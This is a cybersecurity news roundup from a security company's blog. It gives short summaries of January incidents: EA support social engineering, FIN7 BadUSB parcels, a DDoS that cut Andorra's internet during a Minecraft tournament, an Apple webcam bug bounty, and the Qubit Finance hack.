CYBERSECURITY NEWS V. January – Fraudsters stole FIFA accounts, Cyberattacks on Minecraft Tournament Left Andorra’ without Internet

hexway cybersecurity blog brings you the latest news about attacks and data breaches, emerging malware, and vendor security updates

News FYI

Fraudsters scammed EA tech support and stole FIFA accounts

Video game maker Electronic Arts have confirmed that hackers used social engineering techniques to trick the EA support staff into giving them FIFA accounts.

Based on screenshots posted on social media by some of the victims, the accounts were hijacked after the attackers contacted EA tech support and, pretending to be the rightful owners, announced a change in the associated email address. Although many of the scammers' requests were ignored, they continued to insist until one technical support employee neglected formal procedures and relinked email addresses without additional verification of the users’ identity.

EA is currently investigating the incident and taking steps to return the accounts to their rightful owners. In addition, the company expanded the process of verifying account holders, and now any change of email address must be approved by the head of technical support.

FIN7 sent packages with malicious USB devices to US companies

The FIN7 cybercriminal group sent malicious USB devices to US companies to infect their computer systems with ransomware.

The packages were allegedly sent from the US Department of Health and Human Services and were accompanied by letters of advice on the topic of coronavirus infection (COVID-19) attached to USB drives. Other packages were disguised as Amazon parcels in a decorative gift box containing a fake thank you note, a fake gift card, and a USB device.

When the victim connected a USB drive to their computer, the device performed a BadUSB attack. The USB registered itself as a keyboard and sent a series of preconfigured automatic keystrokes to the user's PC. Keystrokes launched PowerShell commands that downloaded and installed various kinds of malware. Thus, cyber criminals gained administrative access and then moved to other local systems.

Cyberattacks on Minecraft Tournament Left Andorra’ without Internet

During the Minecraft tournament called SquidCraft Games, unknown people brought down the servers of Andorra's only ISP using a DDoS attack.

The only provider of the Principality of Andorra could not withstand the load, and all residents of the European country were left without access to the Internet for half an hour.

The problem was fixed only after the disqualification of streamers from Team Andorra. Most likely, the attacks were directed specifically against Team Andorra to deprive them of their chances to win the main prize.

Apple pays record $100,000 to student for webcam vulnerabilities in iOS and macOS

Ryan Pickren discovered vulnerabilities in iPhone and Mac webcams and received a record payout of $100,500 from Apple. According to Pickren, a chain of 4 vulnerabilities (CVE-2021-30861, CVE-2021-30975, and two non-CVE issues) affects Safari and iCloud.

The exploitation of the vulnerability allows an attacker to gain full access to all accounts, including iCloud and PayPal, as well as microphone, camera, and screen sharing permissions. The hack eventually grants full access to the entire file system of the device. Thus is achieved through the webarchive files of Safari, which it uses to save local copies of websites.

To carry out an attack, an attacker has to force the victim to download such a web archive file and open it.

Apple has not commented on the bug, and it is unknown if it was used in actual attacks. The tech giant paid Pickren $100,500 as part of its vulnerability discovery bounty program.

Hackers stole $80 million from DeFi platform Qubit Finance

Qubit Finance powered by Binance Smart Chain (BSC) has been hacked. According to information security and blockchain analytics company PeckShield, the attackers withdrew digital assets worth about $80 million from the project pool.

While the details of the hack are unknown, analysts noted that the hackers used an exploit of the QBridge cross-chain service, which allowed them to issue a “huge” amount of xETH tokens. The latter was used to secure an illegitimate loan on the platform.

Representatives of the project confirmed the hack and said that they are tracking the stolen funds. They also contacted the attackers and offered the “maximum bounty”. The developers are now working with security partners, including Binance representatives. Most of the platform's features are temporarily disabled.